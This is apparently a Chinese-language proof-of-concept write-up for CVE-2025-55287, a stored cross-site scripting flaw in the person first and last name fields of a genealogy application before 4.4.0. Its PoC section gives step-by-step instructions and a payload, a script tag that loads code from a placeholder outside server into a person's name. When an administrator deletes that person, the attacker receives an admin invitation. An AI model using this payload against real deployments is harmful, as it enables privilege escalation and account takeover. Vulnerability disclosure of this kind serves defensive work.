CVE-2025-55287-POC
已验证的存储型跨站脚本(XSS)漏洞存在于4.4.0之前的家谱应用中,允许任意JavaScript执行,并可从Editor+角色权限提升至管理员。
摘要
- 漏洞类型:存储型跨站脚本(CWE-79)
- 受影响组件:'人员'的名字和姓氏
- 受影响版本:所有4.4.0之前的版本
- 影响:攻击者提供的JavaScript在受害者浏览器中持久执行;可导致会话劫持、基于DOM的CSRF、UI重写、凭据窃取,或以受害者身份执行任意操作
- 攻击向量:已认证用户(任何能够创建新人员的角色——Editor+)
利用原理
根本原因:当高权限用户成功删除受影响的人员时,服务器端对该人员的名字/姓氏清理/编码不充分。
PoC:
- 登录应用(Editor+角色)
- 创建一个新人员(不必归属于任何家庭)
- 将JavaScript作为该人员的名字或姓氏写入:
<script src='yourserver/poc.js'></script>
- 编辑poc.js,将占位符替换为你的电子邮件地址
- 一旦有权限的用户尝试删除新创建的人员,你将收到一封邀请邮件,以管理员角色加入该平台。